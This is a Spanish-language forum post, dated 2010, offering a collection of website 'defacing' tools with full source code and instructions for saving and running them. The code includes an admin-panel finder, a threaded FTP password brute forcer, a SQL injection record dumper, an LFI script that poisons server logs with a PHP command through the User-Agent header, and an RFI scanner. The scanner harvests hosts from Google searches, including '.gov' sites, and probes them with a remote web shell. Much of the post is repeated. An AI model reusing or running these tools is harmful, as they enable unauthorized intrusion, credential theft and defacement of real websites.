Recopilación de Herramientas Defacing.
Publicado: 23 Mar 2010, 13:14
Bueno me paso por aqui.. y os dejo esta recopilación que hecho.
Podeis decir mas herramientas y las pongo
Panel Finder by FOder
Breve explicación
-Programa creado en perl, para buscar el panel de cualquier
web, dando a elegir entre .php o .asp
FTP Brute Forcer by God_MurdoC
Breve explicación:
- Programa que hace fuerza bruta por medio de FTP
Limit Sqli (Perl Script) by Descendent Group
Breve explicación:
- Programa hecho en perl que saca todos los registros de una sentencia SQLi.
[Perl LFI Scanner] By ShadinessDark
Escaner en RFI
Breve explicación:
- Programa creado en phyton que saca las secuencias RFI
SQLi Helper 2.7
- Breve explicación, programa en .exe, que escanea una web haciendo SQL injection.
subido por xassiz
Link de descarga:
[Enlace externo eliminado para invitados] ... xassiz.rar
--------------------------------------------------------------------------------
Estas son las herramientas mas esenciales para el "hackeo" de una web.
Iré actualizando tal y como salgan más, todas las herramientas hechas
en perl y en phyton necesita un programa interprete.
Programa interprete para perl:
[Enlace externo eliminado para invitados]
Sistemas Operativos Soportados: Win98/98SE/Me/2000/NT/XP/2003/Vista
Programa interprete para python:
[Enlace externo eliminado para invitados]
Sistemas Operativos soportados: Win98/98SE/Me/2000/NT/XP/2003/Vista
-------------------------------------------------------------------
Modo y explicación de uso:
Los codigos dados en este post de cada herramienta para que funcione necesitais
hacer los siguientes pasos:
- Abrir el Bloc de Notas
- Copiar el codigo de la Herramienta
- Guardarla como "Herramienta.pl" para perl y "Herramienta.py" para python
Eso es todo, espero que os haya gustado.
Saludos!
Podeis decir mas herramientas y las pongo
Panel Finder by FOder
Breve explicación
-Programa creado en perl, para buscar el panel de cualquier
web, dando a elegir entre .php o .asp
Código: Seleccionar todo
#!/usr/bin/perl
##
# By FoDer
# Admin Control Panel ___ Version 1
#
##
use HTTP::Request;
use LWP::UserAgent;
system('cls');
system('title Panel Finder In Perl by Foder');
print"\n";
print "-----------------------------------------------\n" ;
print "[*]---Panel Finder In Perl by Foder--------[*]\n" ;
print "[*]-------------Coded By Foder----------[*]\n" ;
print "[*]------------- [email protected][*]\n" ;
print "*******************************************\n" ;
print "\n";
print "~# Web para escanear\n* ejemplo de web: www.ejemplo.com> ";
$site=<STDIN>;
chomp $site;
print "\n";
print "~ Codigo de lenguaje de la web \n* ex: asp, php-> ";
$code=<STDIN>;
chomp($code);
if ( $site !~ /^http:/ ) {
$site = 'http://' . $site;
}
if ( $site !~ /\/$/ ) {
$site = $site . '/';
}
print "\n";
print "->Sitio: $site\n";
print "->Sitio.: $code\n";
print "->Procesando..\n\n\n";
if($code eq "asp"){
@path1=('admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','
panel-administracion/','instadmin/',
'memberadmin/','administratorlogin/','adm/','account.asp','admin/account.asp','admin/index.asp','admin/login.asp
','admin/admin.asp',
'admin_area/admin.asp','admin_area/login.asp','admin/account.html','admin/index.html','admin/login.html','admin
/admin.html',
'admin_area/admin.html','admin_area/login.html','admin_area/index.html','admin_area/index.asp','bb-admin/inde
x.asp','bb-admin/login.asp','bb-admin/admin.asp',
'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','admin/controlpanel.htm
l','admin.html','admin/cp.html','cp.html',
'administrator/index.html','administrator/login.html','administrator/account.html','administrator.html','login.html','
modelsearch/login.html','moderator.html',
'moderator/login.html','moderator/admin.html','account.html','controlpanel.html','admincontrol.html','admin_login.
html','panel-administracion/login.html',
'admin/home.asp','admin/controlpanel.asp','admin.asp','pages/admin/admin-login.asp','admin/admin-login.asp','a
dmin-login.asp','admin/cp.asp','cp.asp',
'administrator/account.asp','administrator.asp','login.asp','modelsearch/login.asp','moderator.asp','moderator/logi
n.asp','administrator/login.asp',
'moderator/admin.asp','controlpanel.asp','admin/account.html','adminpanel.html','webadmin.html','pages/admin/a
dmin-login.html','admin/admin-login.html',
'webadmin/index.html','webadmin/admin.html','webadmin/login.html','user.asp','user.html','admincp/index.asp','a
dmincp/login.asp','admincp/index.html',
'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','adminarea/index.html','adminar
ea/admin.html','adminarea/login.html',
'panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/adm
in.html','admin/admin_login.html',
'admincontrol/login.html','adm/index.html','adm.html','admincontrol.asp','admin/account.asp','adminpanel.asp','we
badmin.asp','webadmin/index.asp',
'webadmin/admin.asp','webadmin/login.asp','admin/admin_login.asp','admin_login.asp','panel-administracion/logi
n.asp','adminLogin.asp',
'admin/adminLogin.asp','home.asp','admin.asp','adminarea/index.asp','adminarea/admin.asp','adminarea/login.asp'
,'admin-login.html',
'panel-administracion/index.asp','panel-administracion/admin.asp','modelsearch/index.asp','modelsearch/admin.
asp','administrator/index.asp',
'admincontrol/login.asp','adm/admloginuser.asp','admloginuser.asp','admin2.asp','admin2/login.asp','admin2/inde
x.asp','adm/index.asp',
'adm.asp','affiliate.asp','adm_auth.asp','memberadmin.asp','administratorlogin.asp','siteadmin/login.asp','siteadmin
/index.asp','siteadmin/login.html'
);
foreach $ways(@path1){
$final=$site.$ways;
my $req=HTTP::Request->new(GET=>$final);
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);
if($response->content =~ /Username/ ||
$response->content =~ /Password/ ||
$response->content =~ /username/ ||
$response->content =~ /password/ ||
$response->content =~ /USERNAME/ ||
$response->content =~ /PASSWORD/ ||
$response->content =~ /Senha/ ||
$response->content =~ /senha/ ||
$response->content =~ /Personal/ ||
$response->content =~ /Usuario/ ||
$response->content =~ /Clave/ ||
$response->content =~ /Usager/ ||
$response->content =~ /usager/ ||
$response->content =~ /Sing/ ||
$response->content =~ /passe/ ||
$response->content =~ /P\/W/ ||
$response->content =~ /Admin Password/
){
print " \n [+++++] Encontrado, este es el panel. -> $final\n\n";
}else{
print " Esta no es <- $final\n";
}
}
}
# -------------------------------------------------------
# -------------------test cfm ---------------------------|
# -------------------------------------------------------
if($code eq "cfm"){
@path1=('admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','
panel-administracion/','instadmin/',
'memberadmin/','administratorlogin/','adm/','account.cfm','admin/account.cfm','admin/index.cfm','admin/login.cf
m','admin/admin.cfm',
'admin_area/admin.cfm','admin_area/login.cfm','admin/account.html','admin/index.html','admin/login.html','admi
n/admin.html',
'admin_area/admin.html','admin_area/login.html','admin_area/index.html','admin_area/index.cfm','bb-admin/inde
x.cfm','bb-admin/login.cfm','bb-admin/admin.cfm',
'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','admin/controlpanel.htm
l','admin.html','admin/cp.html','cp.html',
'administrator/index.html','administrator/login.html','administrator/account.html','administrator.html','login.html','
modelsearch/login.html','moderator.html',
'moderator/login.html','moderator/admin.html','account.html','controlpanel.html','admincontrol.html','admin_login.
html','panel-administracion/login.html',
'admin/home.cfm','admin/controlpanel.cfm','admin.cfm','pages/admin/admin-login.cfm','admin/admin-login.cfm',
'admin-login.cfm','admin/cp.cfm','cp.cfm',
'administrator/account.cfm','administrator.cfm','login.cfm','modelsearch/login.cfm','moderator.cfm','moderator/log
in.cfm','administrator/login.cfm',
'moderator/admin.cfm','controlpanel.cfm','admin/account.html','adminpanel.html','webadmin.html','pages/admin/a
dmin-login.html','admin/admin-login.html',
'webadmin/index.html','webadmin/admin.html','webadmin/login.html','user.cfm','user.html','admincp/index.cfm','a
dmincp/login.cfm','admincp/index.html',
'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','adminarea/index.html','adminar
ea/admin.html','adminarea/login.html',
'panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/adm
in.html','admin/admin_login.html',
'admincontrol/login.html','adm/index.html','adm.html','admincontrol.cfm','admin/account.cfm','adminpanel.cfm','w
ebadmin.cfm','webadmin/index.cfm',
'webadmin/admin.cfm','webadmin/login.cfm','admin/admin_login.cfm','admin_login.cfm','panel-administracion/lo
gin.cfm','adminLogin.cfm',
'admin/adminLogin.cfm','home.cfm','admin.cfm','adminarea/index.cfm','adminarea/admin.cfm','adminarea/login.cf
m','admin-login.html',
'panel-administracion/index.cfm','panel-administracion/admin.cfm','modelsearch/index.cfm','modelsearch/admin.
cfm','administrator/index.cfm',
'admincontrol/login.cfm','adm/admloginuser.cfm','admloginuser.cfm','admin2.cfm','admin2/login.cfm','admin2/ind
ex.cfm','adm/index.cfm',
'adm.cfm','affiliate.cfm','adm_auth.cfm','memberadmin.cfm','administratorlogin.cfm','siteadmin/login.cfm','siteadm
in/index.cfm','siteadmin/login.html'
);
foreach $ways(@path1){
$final=$site.$ways;
my $req=HTTP::Request->new(GET=>$final);
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);
if($response->content =~ /Username/ ||
$response->content =~ /Password/ ||
$response->content =~ /username/ ||
$response->content =~ /password/ ||
$response->content =~ /USERNAME/ ||
$response->content =~ /PASSWORD/ ||
$response->content =~ /Senha/ ||
$response->content =~ /senha/ ||
$response->content =~ /Personal/ ||
$response->content =~ /Usuario/ ||
$response->content =~ /Clave/ ||
$response->content =~ /Usager/ ||
$response->content =~ /usager/ ||
$response->content =~ /Sing/ ||
$response->content =~ /passe/ ||
$response->content =~ /P\/W/ ||
$response->content =~ /Admin Password/
){
print " \n [+] Este es el panel -> $final\n\n";
}else{
print "[-] Este no es el panel <- $final\n";
}
}
}
# -------------------------------------------------------
#--------------------------/test-------------------------|
# -------------------------------------------------------
if($code eq "php"){
@path2=('admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','
panel-administracion/','instadmin/',
'memberadmin/','administratorlogin/','adm/','admin/account.php','admin/index.php','admin/login.php','admin/ad
min.php','admin/account.php',
'admin_area/admin.php','admin_area/login.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.html'
,'admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
'admin_area/index.php','bb-admin/index.php','bb-admin/login.php','bb-admin/admin.php','admin/home.php','ad
min_area/login.html','admin_area/index.html',
'admin/controlpanel.php','admin.php','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/accou
nt.html','adminpanel.html','webadmin.html',
'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html
','panel-administracion/login.html',
'admin/cp.php','cp.php','administrator/index.php','administrator/login.php','nsw/admin/login.php','webadmin/logi
n.php','admin/admin_login.php','admin_login.php',
'administrator/account.php','administrator.php','admin_area/admin.html','pages/admin/admin-login.php','admin/a
dmin-login.php','admin-login.php',
'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.php','modelsearch/
login.php','moderator.php','moderator/login.php',
'moderator/admin.php','account.php','pages/admin/admin-login.html','admin/admin-login.html','admin-login.htm
l','controlpanel.php','admincontrol.php',
'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.php','admin
area/index.html','adminarea/admin.html',
'webadmin.php','webadmin/index.php','webadmin/admin.php','admin/controlpanel.html','admin.html','admin/cp.ht
ml','cp.html','adminpanel.php','moderator.html',
'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','l
ogin.html','modelsearch/login.html',
'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.htm
l','modelsearch/index.html','modelsearch/admin.html',
'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.php','account.html','controlpa
nel.html','admincontrol.html',
'panel-administracion/login.php','wp-login.php','adminLogin.php','admin/adminLogin.php','home.php','admin.php',
'adminarea/index.php',
'adminarea/admin.php','adminarea/login.php','panel-administracion/index.php','panel-administracion/admin.php',
'modelsearch/index.php',
'modelsearch/admin.php','admincontrol/login.php','adm/admloginuser.php','admloginuser.php','admin2.php','admi
n2/login.php','admin2/index.php',
'adm/index.php','adm.php','affiliate.php','adm_auth.php','memberadmin.php','administratorlogin.php'
);
foreach $ways(@path2){
$final=$site.$ways;
my $req=HTTP::Request->new(GET=>$final);
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);
if($response->content =~ /Username/ ||
$response->content =~ /Password/ ||
$response->content =~ /username/ ||
$response->content =~ /password/ ||
$response->content =~ /USERNAME/ ||
$response->content =~ /PASSWORD/ ||
$response->content =~ /Senha/ ||
$response->content =~ /senha/ ||
$response->content =~ /Personal/ ||
$response->content =~ /Usuario/ ||
$response->content =~ /Clave/ ||
$response->content =~ /Usager/ ||
$response->content =~ /usager/ ||
$response->content =~ /Sing/ ||
$response->content =~ /passe/ ||
$response->content =~ /P\/W/ ||
$response->content =~ /Admin Password/
){
print " \n [+++++++] Encontrado este es el panel -> $final\n\n";
}else{
print " Esta no es el panel. <- $final\n";
}
}
kill("STOP",NULL);
}
FTP Brute Forcer by God_MurdoC
Breve explicación:
- Programa que hace fuerza bruta por medio de FTP
Código: Seleccionar todo
#!usr/bin/python
#Ftp Brute Forcer
import threading, time, random, sys, ftplib
from ftplib import FTP
from copy import copy
if len(sys.argv) !=4:
print "Usage: ./ftpbrute.py <server> <userlist> <wordlist>"
sys.exit(1)
try:
users = open(sys.argv[2], "r").readlines()
except(IOError):
print "Error: Check your userlist path\n"
sys.exit(1)
try:
words = open(sys.argv[3], "r").readlines()
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)
print "\n\t d3hydr8[at]gmail[dot]com ftpBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Server:",sys.argv[1]
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words),"\n"
try:
f = FTP(sys.argv[1])
print "[+] Response:",f.getwelcome()
except (ftplib.all_errors):
pass
try:
print "\n[+] Checking for anonymous login\n"
ftp = FTP(sys.argv[1])
ftp.login()
ftp.retrlines('LIST')
print "\t\nAnonymous login successful!!!\n"
ftp.quit()
except (ftplib.all_errors):
print "\tAnonymous login unsuccessful\n"
wordlist = copy(words)
def reloader():
for word in wordlist:
words.append(word)
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])
else:
print "\nReloading Wordlist - Changing User\n"
reloader()
value = random.sample(words, 1)
users.remove(users[0])
lock.release()
if len(users) ==1:
return value[0][:-1], users[0]
else:
return value[0][:-1], users[0][:-1]
class Worker(threading.Thread):
def run(self):
value, user = getword()
try:
print "-"*12
print "User:",user,"Password:",value
ftp = FTP(sys.argv[1])
ftp.login(user, value)
ftp.retrlines('LIST')
print "\t\nLogin successful:",value, user
ftp.quit()
work.join()
sys.exit(2)
except (ftplib.all_errors), msg:
#print "An error occurred:", msg
pass
for i in range(len(words)*len(users)):
work = Worker()
work.start()
time.sleep(1)Limit Sqli (Perl Script) by Descendent Group
Breve explicación:
- Programa hecho en perl que saca todos los registros de una sentencia SQLi.
Código: Seleccionar todo
system("cls");
print "|----------------------------------------------------|\n";
print "| Limit SQLi |\n";
print "| Limit One by One Your Sql Injection |\n";
print "| By Descendents |\n";
print "|----------------------------------------------------|\n";
print "Example:\n";
print "http://testphp.acunetix.com/artists.php?artist=-2\n";
print "union all select 1,concat(0x3b,0x3b,0x3b,column_name,0x3b,0x3b,0x3b),3\n";
print "from information_schema.columns";
use LWP::UserAgent;
print "\n\n\nSTEP1 \nTarget:[http://wwww.target.com/path=SQL INJECTION]: ";
chomp(my $target=<STDIN>);
system("cls");
print "Example: ;;;\n\n";
print "\nSTEP2 \nSearch Result String Between: ";
chomp(my $e1=<STDIN>);
print "\n\nExample: ;;;\n";
print "\nAnd: ";
chomp(my $e2=<STDIN>);
system("cls");
print "If you want delete some string of the result. You can do it now.\n";
print "Write string that you want delete.\n";
print "If you dont want delete any string, dont write nothing.\n";
print "\n\nSTEP3 \nFirst Debug String:";
chomp(my $de=<STDIN>);
print "\n\nSecond Debug String:";
chomp(my $de2=<STDIN>);
system("cls");
print "STEP4 \nDo you know how many records there are? OR \nDo you want force the number of the records?\nYes=1 No=2 Default=No: ";
chomp(my $op2=<STDIN>);
if ($op2==1){
print "\nHow Many?: ";
chomp(my $how=<STDIN>);
$nu=$how;
}
else {
$nu=10000000;
}
system("cls");
print "STEP5 \nDo you want save the result in a file? Yes=1 No=2 Default=No: ";
chomp(my $op=<STDIN>);
if ($op==1){
print "\nSave Path File: ";
chomp(my $path=<STDIN>);
open(FILEHANDLE, ">".$path) or die 'cannot open file!';
}
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
for($num = 0; $num < $nu; $num++) {
$host = $target." limit ".$num.",1--";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;
#if ($answer=~ /<h2 id='pageName'>artist: (.*?)<\/h2>/is){
#if ($answer=~ /$e1 (.*?)$e2/is){
#if ($answer=~/<$e1[^>]*>(.*?)<\/$e1>/){
if ($answer=~/$e1(.*?)$e2/){
$string =$1;
$string =~ s/$de/ /g;
$stringfinal =$string;
$stringfinal =~ s/$de2/ /g;
print "\n[+] ".$num." : $stringfinal";
if ($op==1){
print FILEHANDLE "\n[+] ".$num." : $stringfinal";
}
}
else{
if ($op2!=1){
last;
}
if ($op==1){
close(FILEHANDLE);
}
}
}
[Perl LFI Scanner] By ShadinessDark
Código: Seleccionar todo
#!/usr/bin/perl
# LFI Scanner By ShadinessDark
# Www.ethical-security.co.cc
use LWP::UserAgent;
system("cls");
#system("clear");
print " -------------------------------------------------\n";
print " [LFI Scanner] \n";
print " -------------------------------------------------\n";
print " Insert Bugged Site (http://site.com/?p=): \n";
chomp($site = <STDIN>);
print " -------------------------------------------------\n";
print " Insert php command to execute (with <?php ?>): \n";
chomp($cmd = <STDIN>);
print " Insert Logs path ( ex ../../../etc/passwd ): \n";
chomp($path = <STDIN>);
print " -------------------------------------------------\n";
print " Ok... Espere porfavor \n";
print " -------------------------------------------------\n";
#Infect Logs
$lwp = LWP::UserAgent->new;
$ua = $lwp->get($site);
$lwp->agent('coderz'.$cmd.'/coderz');
#Control
$ua = $lwp->get($site.$path.'%00');
if($ua->content =~ m/cod3rz/) {
print " Ok ".$site.$paths[$i]." is infected \n";
print " -------------------------------------------------\n";
}Escaner en RFI
Breve explicación:
- Programa creado en phyton que saca las secuencias RFI
Código: Seleccionar todo
#!/usr/bin/python
#RFI Scanner that can find hosts using a google query or search one site.
#When the scan is complete
#it will print out the rfi's found and or write to file. It also has verbose mode for more
#output.
#http://darkcode.ath.cx
#d3hydr8[at]gmail[dot]com
import sys, urllib2, re, sets, random, httplib, time, socket
def title():
print "\n\t d3hydr8[at]gmail[dot]com RFI Scanner v1.0"
print "\t-----------------------------------------------"
def usage():
title()
print "\n Usage: python RFIscan.py <option>\n"
print "\n Example: python RFIscan.py -g inurl:'.gov' 200 -s 'http://localhost/shell.txt' -write rfi_found.txt -v\n"
print "\t[options]"
print "\t -g/-google <query> <num of hosts> : Searches google for hosts"
print "\t -t/-target <website> <port>: Searches just that site, (default port 80)"
print "\t -s/-shell <shell> : Shell location"
print "\t -w/-write <file> : Writes potential XSS found to file"
print "\t -v/-verbose : Verbose Mode\n"
def StripTags(text):
finished = 0
while not finished:
finished = 1
start = text.find("<")
if start >= 0:
stop = text[start:].find(">")
if stop >= 0:
text = text[:start] + text[start+stop+1:]
finished = 0
return text
def timer():
now = time.localtime(time.time())
return time.asctime(now)
def geturls(query):
counter = 10
urls = []
while counter < int(sys.argv[3]):
url = 'http://www.google.com/search?hl=en&q='+query+'&hl=en&lr=&start='+repr(counter)+'&sa=N'
opener = urllib2.build_opener(url)
opener.addheaders = [('User-agent', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)')]
data = opener.open(url).read()
hosts = re.findall(('\w+\.[\w\.\-/]*\.\w+'),StripTags(data))
#Lets add sites found to a list if not already or a google site.
#We don't want to upset the people that got our list for us.
for x in hosts:
if x.find('www') != -1:
x = x[x.find('www'):]
if x not in urls and re.search("google", x) == None:
urls.append(x)
counter += 10
return urls
def getvar(site):
names = []
actions = []
print "\n","-"*45
print "[+] Searching:",site
try:
webpage = urllib2.urlopen(proto+"://"+site, port).read()
var = re.findall("\?[\w\.\-/]*\=",webpage)
if len(var) >=1:
var = list(sets.Set(var))
found_action = re.findall("action=\"[\w\.\-/]*\"", webpage.lower())
found_action = list(sets.Set(found_action))
if len(found_action) >= 1:
for a in found_action:
a = a.split('"',2)[1]
try:
if a[0] != "/":
a = "/"+a
except(IndexError):
pass
actions.append(a)
found_names = re.findall("name=\"[\w\.\-/]*\"", webpage.lower())
found_names = list(sets.Set(found_names))
for n in found_names:
names.append(n.split('"',2)[1])
print "[+] Variables:",len(var),"| Actions:",len(actions),"| Fields:",len(names)
print "[+] Avg Requests:",(len(var)+len(names)+(len(actions)*len(names))+(len(actions)*len(names)))
if len(var) >= 1:
for v in var:
if site.count("/") >= 2:
for x in xrange(site.count("/")):
tester(site.rsplit('/',x+1)[0]+"/"+v+shell)
tester(site+"/"+v+shell)
if len(names) >= 1:
for n in names:
if site.count("/") >= 2:
for x in xrange(site.count("/")):
tester(site.rsplit('/',x+1)[0]+"/"+"?"+n+"="+shell)
tester(site+"/"+"?"+n+"="+shell)
if len(actions) != 0 and len(names) >= 1:
for a in actions:
for n in names:
if site.count("/") >= 2:
for x in xrange(site.count("/")):
tester(site.rsplit('/',x+1)[0]+a+"?"+n+"="+shell)
#tester(site.split("/")[0]+a+"?"+n+"="+shell)
if len(actions) != 0 and len(var) >= 1:
for a in actions:
for v in var:
if site.count("/") >= 2:
for x in xrange(site.count("/")):
tester(site.rsplit('/',x+1)[0]+a+v+shell)
else:
tester(site.split("/")[0]+a+v+shell)
if sys.argv[1].lower() == "-g" or sys.argv[1].lower() == "-google":
urls.remove(site)
except(socket.timeout, IOError, ValueError, socket.error, socket.gaierror, httplib.BadStatusLine):
if sys.argv[1].lower() == "-g" or sys.argv[1].lower() == "-google":
urls.remove(site)
pass
except(KeyboardInterrupt):
print "\n[-] Cancelled -",timer(),"\n"
sys.exit(1)
def tester(victim):
if verbose ==1:
print "Target:",victim
try:
source = urllib2.urlopen(proto+"://"+victim, port).read()
h = httplib.HTTPConnection(victim.split('/')[0], int(port))
try:
h.request("GET", "/"+victim.split('/',1)[1])
except(IndexError):
h.request("GET", "/")
r1 = h.getresponse()
if verbose ==1:
print "\t[+] Response:",r1.status, r1.reason
if re.search(title, source) != None and r1.status not in range(303, 418):
if victim not in found_rfi:
print "\n[!] RFI:", victim
print "\t[+] Response:",r1.status, r1.reason
found_rfi.append(victim)
except(socket.timeout, socket.gaierror, socket.error, IOError, ValueError, httplib.BadStatusLine, httplib.IncompleteRead, httplib.InvalidURL):
pass
except(KeyboardInterrupt):
print "\n[-] Cancelled -",timer(),"\n"
sys.exit(1)
except():
pass
if len(sys.argv) <= 3:
usage()
sys.exit(1)
for arg in sys.argv[1:]:
if arg.lower() == "-v" or arg.lower() == "-verbose":
verbose = 1
if arg.lower() == "-w" or arg.lower() == "-write":
txt = sys.argv[int(sys.argv[1:].index(arg))+2]
if arg.lower() == "-s" or arg.lower() == "-shell":
shell = sys.argv[int(sys.argv[1:].index(arg))+2]
title()
socket.setdefaulttimeout(3)
found_rfi = []
done = []
count = 0
proto = "http"
print "\n[+] RFI_scan Loaded"
try:
if verbose ==1:
print "[+] Verbose Mode On"
except(NameError):
verbose = 0
print "[-] Verbose Mode Off"
try:
source = urllib2.urlopen(shell).read()
title = str(re.findall("<title>.*</title>",source)[0])
if title.find('c99shell') != -1:
title = "c99shell"
if title.find('r57') != -1:
title = "r57"
except(IndexError), msg:
print msg
print "\n[-] Improper Shell Location in Path\n"
print "[-] Option: -s/-shell\n"
sys.exit(1)
except(urllib2.HTTPError, urllib2.URLError), msg:
print "\n[-] Couldn't connect to shell?"
print "[-] Message:",msg,"\n"
sys.exit(1)
print "[+] Shell:",shell
if title != "c99shell" and title != "r57":
print "[+] Shell Title:",title.rsplit("</title>",1)[0].split("<title>",1)[1]
else:
print "[+] Shell Title:",title
try:
if txt:
print "[+] File:",txt
except(NameError):
txt = None
pass
if sys.argv[1].lower() == "-g" or sys.argv[1].lower() == "-google":
try:
if sys.argv[3].isdigit() == False:
print "\n[-] Argument [",sys.argv[3],"] must be a number.\n"
sys.exit(1)
else:
if int(sys.argv[3]) <= 10:
print "\n[-] Argument [",sys.argv[3],"] must be greater than 10.\n"
sys.exit(1)
except(IndexError):
print "\n[-] Need number of hosts to collect.\n"
sys.exit(1)
query = re.sub("\s","+",sys.argv[2])
port = "80"
print "[+] Query:",query
print "[+] Querying Google..."
urls = geturls(query)
print "[+] Collected:",len(urls),"hosts"
print "[+] Started:",timer()
print "\n[-] Cancel: Press Ctrl-C"
time.sleep(3)
while len(urls) > 0:
print "-"*45
print "\n[-] Length:",len(urls),"remain"
getvar(random.choice(urls))
if sys.argv[1].lower() == "-t" or sys.argv[1].lower() == "-target":
site = sys.argv[2]
try:
if sys.argv[3].isdigit() == False:
port = "80"
else:
port = sys.argv[3]
except(IndexError):
port = "80"
print "[+] Site:",site
print "[+] Port:",port
if site[:7] == "http://":
site = site.replace("http://","")
if site[:8] == "https://":
proto = "https"
if port == "80":
print "[!] Using port 80 with https? (443)"
site = site.replace("https://","")
print "[+] Started:",timer()
print "\n[-] Cancel: Press Ctrl-C"
time.sleep(4)
getvar(site)
print "-"*65
print "\n\n[+] Potential RFI found:",len(found_rfi),"\n"
time.sleep(3)
if txt != None and len(found_rfi) >=1:
rfi_file = open(txt, "a")
rfi_file.writelines("\n\td3hydr8[at]gmail[dot]com RFI Scanner v1.0\n")
rfi_file.writelines("\t------------------------------------------\n\n")
print "[+] Writing Data:",txt
else:
print "[-] No data written to disk"
for k in found_rfi:
count+=1
if txt != None:
rfi_file.writelines("["+str(count)+"] "+k+"\n")
print "\n["+str(count)+"]",k
print "\n[-] Done -",timer(),"\n"SQLi Helper 2.7
- Breve explicación, programa en .exe, que escanea una web haciendo SQL injection.
subido por xassiz
Link de descarga:
[Enlace externo eliminado para invitados] ... xassiz.rar
--------------------------------------------------------------------------------
Estas son las herramientas mas esenciales para el "hackeo" de una web.
Iré actualizando tal y como salgan más, todas las herramientas hechas
en perl y en phyton necesita un programa interprete.
Programa interprete para perl:
[Enlace externo eliminado para invitados]
Sistemas Operativos Soportados: Win98/98SE/Me/2000/NT/XP/2003/Vista
Programa interprete para python:
[Enlace externo eliminado para invitados]
Sistemas Operativos soportados: Win98/98SE/Me/2000/NT/XP/2003/Vista
-------------------------------------------------------------------
Modo y explicación de uso:
Los codigos dados en este post de cada herramienta para que funcione necesitais
hacer los siguientes pasos:
- Abrir el Bloc de Notas
- Copiar el codigo de la Herramienta
- Guardarla como "Herramienta.pl" para perl y "Herramienta.py" para python
Eso es todo, espero que os haya gustado.
Saludos!